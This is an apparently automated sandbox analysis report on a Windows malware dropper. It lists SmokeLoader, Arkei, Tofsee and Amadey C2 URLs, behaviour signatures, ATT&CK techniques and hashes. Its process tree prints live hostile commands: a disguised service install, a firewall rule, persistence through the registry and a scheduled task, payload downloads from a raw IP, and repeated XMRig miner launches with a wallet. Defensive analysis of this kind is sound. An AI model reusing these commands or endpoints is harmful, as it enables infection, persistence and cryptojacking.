Analysis

  • max time kernel
    116s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    14-01-2022 11:21

General

  • Target

    f768f4a81e8b87d6990895a35b8d7d6c.exe

  • Size

    312KB

  • MD5

    f768f4a81e8b87d6990895a35b8d7d6c

  • SHA1

    d0e5c1e975ec41e222f99f7a235d85317a1be3a7

  • SHA256

    164149035d4a3d2edba76c0601f6f83e04d45d7c057d221130c57fc9b13fd5b5

  • SHA512

    004dffbfcf0f36e6c4a411d3d499f25d8441f98f465d1b8a704ce9e9004d2785604c15f96e33a9761defe4ae1454e84bd76dd5cae1a3658ef14d301fe0b69720

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

arkei

Botnet

Default

C2

http://file-file-host4.com/tratata.php

Extracted

Family

tofsee

C2

patmushta.info

parubey.info

Extracted

Family

amadey

Version

3.01

C2

185.215.113.35/d2VxjasuwS/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Arkei

    Arkei is an infostealer written in C++.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

    suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 2 IoCs
  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 21 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 9 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f768f4a81e8b87d6990895a35b8d7d6c.exe
    "C:\Users\Admin\AppData\Local\Temp\f768f4a81e8b87d6990895a35b8d7d6c.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Users\Admin\AppData\Local\Temp\f768f4a81e8b87d6990895a35b8d7d6c.exe
      "C:\Users\Admin\AppData\Local\Temp\f768f4a81e8b87d6990895a35b8d7d6c.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:964
  • C:\Users\Admin\AppData\Local\Temp\7ED.exe
    C:\Users\Admin\AppData\Local\Temp\7ED.exe
    1⤵
    • Executes dropped EXE
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:1376
  • C:\Users\Admin\AppData\Local\Temp\1692.exe
    C:\Users\Admin\AppData\Local\Temp\1692.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1368
    • C:\Users\Admin\AppData\Local\Temp\1692.exe
      C:\Users\Admin\AppData\Local\Temp\1692.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:560
  • C:\Users\Admin\AppData\Local\Temp\1D47.exe
    C:\Users\Admin\AppData\Local\Temp\1D47.exe
    1⤵
    • Executes dropped EXE
    PID:1572
  • C:\Users\Admin\AppData\Local\Temp\238F.exe
    C:\Users\Admin\AppData\Local\Temp\238F.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:588
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kaurevpg\
      2⤵
        PID:1588
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vxfeuuol.exe" C:\Windows\SysWOW64\kaurevpg\
        2⤵
          PID:992
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create kaurevpg binPath= "C:\Windows\SysWOW64\kaurevpg\vxfeuuol.exe /d\"C:\Users\Admin\AppData\Local\Temp\238F.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1684
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description kaurevpg "wifi internet conection"
            2⤵
              PID:884
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start kaurevpg
              2⤵
                PID:724
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:916
              • C:\Users\Admin\AppData\Local\Temp\2870.exe
                C:\Users\Admin\AppData\Local\Temp\2870.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:1040
                • C:\Users\Admin\AppData\Local\Temp\2870.exe
                  C:\Users\Admin\AppData\Local\Temp\2870.exe
                  2⤵
                  • Executes dropped EXE
                  PID:320
                • C:\Users\Admin\AppData\Local\Temp\2870.exe
                  C:\Users\Admin\AppData\Local\Temp\2870.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1632
              • C:\Windows\SysWOW64\kaurevpg\vxfeuuol.exe
                C:\Windows\SysWOW64\kaurevpg\vxfeuuol.exe /d"C:\Users\Admin\AppData\Local\Temp\238F.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1112
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:1692
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1920
              • C:\Users\Admin\AppData\Local\Temp\8997.exe
                C:\Users\Admin\AppData\Local\Temp\8997.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:896
                • C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                  "C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:816
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\
                    3⤵
                      PID:1040
                      • C:\Windows\SysWOW64\reg.exe
                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\
                        4⤵
                          PID:532
                      • C:\Windows\SysWOW64\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F
                        3⤵
                        • Creates scheduled task(s)
                        PID:992
                  • C:\Users\Admin\AppData\Local\Temp\976D.exe
                    C:\Users\Admin\AppData\Local\Temp\976D.exe
                    1⤵
                    • Executes dropped EXE
                    PID:912
                  • C:\Users\Admin\AppData\Local\Temp\9C20.exe
                    C:\Users\Admin\AppData\Local\Temp\9C20.exe
                    1⤵
                    • Executes dropped EXE
                    PID:1832
                  • C:\Users\Admin\AppData\Local\Temp\A525.exe
                    C:\Users\Admin\AppData\Local\Temp\A525.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:1080
                  • C:\Users\Admin\AppData\Local\Temp\AFB1.exe
                    C:\Users\Admin\AppData\Local\Temp\AFB1.exe
                    1⤵
                    • Executes dropped EXE
                    PID:1384
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B3F4.tmp\B3F5.tmp\B3F6.bat C:\Users\Admin\AppData\Local\Temp\AFB1.exe"
                      2⤵
                        PID:1844
                        • C:\Users\Admin\AppData\Local\Temp\B3F4.tmp\B3F5.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\B3F4.tmp\B3F5.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                          3⤵
                          • Executes dropped EXE
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:1492
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19960\360t.vbs"
                          3⤵
                          • Blocklisted process makes network request
                          PID:1572
                        • C:\Users\Admin\AppData\Local\Temp\B3F4.tmp\B3F5.tmp\extd.exe
                          C:\Users\Admin\AppData\Local\Temp\B3F4.tmp\B3F5.tmp\extd.exe "/download" "http://81.163.30.181/1.exe" "setup_c.exe" "" "" "" "" "" ""
                          3⤵
                          • Executes dropped EXE
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          PID:916
                        • C:\Users\Admin\AppData\Local\Temp\19960\setup_c.exe
                          setup_c.exe
                          3⤵
                            PID:1252
                          • C:\Users\Admin\AppData\Local\Temp\B3F4.tmp\B3F5.tmp\extd.exe
                            C:\Users\Admin\AppData\Local\Temp\B3F4.tmp\B3F5.tmp\extd.exe "/download" "http://81.163.30.181/2.exe" "setup_m.exe" "" "" "" "" "" ""
                            3⤵
                            • Executes dropped EXE
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1460
                          • C:\Users\Admin\AppData\Local\Temp\19960\setup_m.exe
                            setup_m.exe
                            3⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                            PID:1716
                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                              4⤵
                                PID:1836
                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                4⤵
                                  PID:2084
                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                  4⤵
                                    PID:2128
                                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                    4⤵
                                      PID:2168
                                    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                      4⤵
                                        PID:2204
                                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                        4⤵
                                          PID:2240
                                        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                          4⤵
                                            PID:2276
                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                            4⤵
                                              PID:2312
                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                              4⤵
                                                PID:2348
                                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                4⤵
                                                  PID:2384
                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                  4⤵
                                                    PID:2424
                                                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                    4⤵
                                                      PID:2460
                                                    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                      4⤵
                                                        PID:2500
                                                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                        4⤵
                                                          PID:2536
                                                        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                          4⤵
                                                            PID:2572
                                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                            4⤵
                                                              PID:2612
                                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                              4⤵
                                                                PID:2648
                                                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                                4⤵
                                                                  PID:2696
                                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                                  4⤵
                                                                    PID:2736
                                                                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                                    4⤵
                                                                      PID:2776
                                                                    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                                      4⤵
                                                                        PID:2820
                                                                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                                        4⤵
                                                                          PID:2864
                                                                        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                                          4⤵
                                                                            PID:2912
                                                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                                            4⤵
                                                                              PID:2972
                                                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                                              4⤵
                                                                                PID:3016
                                                                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                                                4⤵
                                                                                  PID:3052
                                                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 88Tr2gg1S3gSbo5pMPCkeZDzr99uKjyu3RmaVqbvnQSzMp215cHmzvTBsofyDqaJ8qCf7wjbpeHigDbUwwaXdbYvAio1Up7 -p x -k -v=0 --donate-level=1 -t 1
                                                                                  4⤵
                                                                                    PID:2056
                                                                                • C:\Users\Admin\AppData\Local\Temp\B3F4.tmp\B3F5.tmp\extd.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\B3F4.tmp\B3F5.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  PID:1252
                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                              1⤵
                                                                              • Accesses Microsoft Outlook profiles
                                                                              • outlook_office_path
                                                                              • outlook_win_path
                                                                              PID:912
                                                                            • C:\Windows\explorer.exe
                                                                              C:\Windows\explorer.exe
                                                                              1⤵
                                                                                PID:532
                                                                              • C:\Windows\system32\taskeng.exe
                                                                                taskeng.exe {1C0369D6-A19B-4485-9DB3-8499C8169DF7} S-1-5-21-3846991908-3261386348-1409841751-1000:VQVVOAJK\Admin:Interactive:[1]
                                                                                1⤵
                                                                                  PID:832
                                                                                  • C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                                                                                    2⤵
                                                                                      PID:948

                                                                                  Network

                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                  Execution

                                                                                  Scheduled Task

                                                                                  1
                                                                                  T1053

                                                                                  Persistence

                                                                                  New Service

                                                                                  1
                                                                                  T1050

                                                                                  Modify Existing Service

                                                                                  1
                                                                                  T1031

                                                                                  Registry Run Keys / Startup Folder

                                                                                  2
                                                                                  T1060

                                                                                  Scheduled Task

                                                                                  1
                                                                                  T1053

                                                                                  Privilege Escalation

                                                                                  New Service

                                                                                  1
                                                                                  T1050

                                                                                  Scheduled Task

                                                                                  1
                                                                                  T1053

                                                                                  Defense Evasion

                                                                                  Disabling Security Tools

                                                                                  1
                                                                                  T1089

                                                                                  Modify Registry

                                                                                  3
                                                                                  T1112

                                                                                  Credential Access

                                                                                  Credentials in Files

                                                                                  2
                                                                                  T1081

                                                                                  Discovery

                                                                                  Query Registry

                                                                                  2
                                                                                  T1012

                                                                                  System Information Discovery

                                                                                  2
                                                                                  T1082

                                                                                  Peripheral Device Discovery

                                                                                  1
                                                                                  T1120

                                                                                  Collection

                                                                                  Data from Local System

                                                                                  2
                                                                                  T1005

                                                                                  Email Collection

                                                                                  1
                                                                                  T1114

                                                                                  Command and Control

                                                                                  Web Service

                                                                                  1
                                                                                  T1102

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • C:\Users\Admin\AppData\Local\Temp\1692.exe
                                                                                    MD5

                                                                                    f768f4a81e8b87d6990895a35b8d7d6c

                                                                                    SHA1

                                                                                    d0e5c1e975ec41e222f99f7a235d85317a1be3a7

                                                                                    SHA256

                                                                                    164149035d4a3d2edba76c0601f6f83e04d45d7c057d221130c57fc9b13fd5b5

                                                                                    SHA512

                                                                                    004dffbfcf0f36e6c4a411d3d499f25d8441f98f465d1b8a704ce9e9004d2785604c15f96e33a9761defe4ae1454e84bd76dd5cae1a3658ef14d301fe0b69720

                                                                                  • C:\Users\Admin\AppData\Local\Temp\1692.exe
                                                                                    MD5

                                                                                    f768f4a81e8b87d6990895a35b8d7d6c

                                                                                    SHA1

                                                                                    d0e5c1e975ec41e222f99f7a235d85317a1be3a7

                                                                                    SHA256

                                                                                    164149035d4a3d2edba76c0601f6f83e04d45d7c057d221130c57fc9b13fd5b5

                                                                                    SHA512

                                                                                    004dffbfcf0f36e6c4a411d3d499f25d8441f98f465d1b8a704ce9e9004d2785604c15f96e33a9761defe4ae1454e84bd76dd5cae1a3658ef14d301fe0b69720

                                                                                  • C:\Users\Admin\AppData\Local\Temp\1692.exe
                                                                                    MD5

                                                                                    f768f4a81e8b87d6990895a35b8d7d6c

                                                                                    SHA1

                                                                                    d0e5c1e975ec41e222f99f7a235d85317a1be3a7

                                                                                    SHA256

                                                                                    164149035d4a3d2edba76c0601f6f83e04d45d7c057d221130c57fc9b13fd5b5

                                                                                    SHA512

                                                                                    004dffbfcf0f36e6c4a411d3d499f25d8441f98f465d1b8a704ce9e9004d2785604c15f96e33a9761defe4ae1454e84bd76dd5cae1a3658ef14d301fe0b69720

                                                                                  • C:\Users\Admin\AppData\Local\Temp\19960\360t.vbs
                                                                                    MD5

                                                                                    21b135052ce317db62240887b33c55b5

                                                                                    SHA1

                                                                                    a828def0249155fb933c1a35ccc1f93e6f53e865

                                                                                    SHA256

                                                                                    75ca9f7e0a78fec46af44c68604aaf83f1b984bff25b66e43252e89dacec6e64

                                                                                    SHA512

                                                                                    ecf2e547decd3cdb6a836be053b9993933a74208c68037287960bd8c96430fdf0acf8683aa757517378f4b080c395a03cd30baa32ac4faf5af92ae62baba61ec

                                                                                  • C:\Users\Admin\AppData\Local\Temp\19960\setup_c.exe
                                                                                    MD5

                                                                                    25c152d0f7f59d82854da128a1920795

                                                                                    SHA1

                                                                                    f443e0e795a5612d197a7d1fbd75c60c6493c1e6

                                                                                    SHA256

                                                                                    e818aee30503e8700185624059b89ebf7daccd482964a073f1ffdcbd5482b025

                                                                                    SHA512

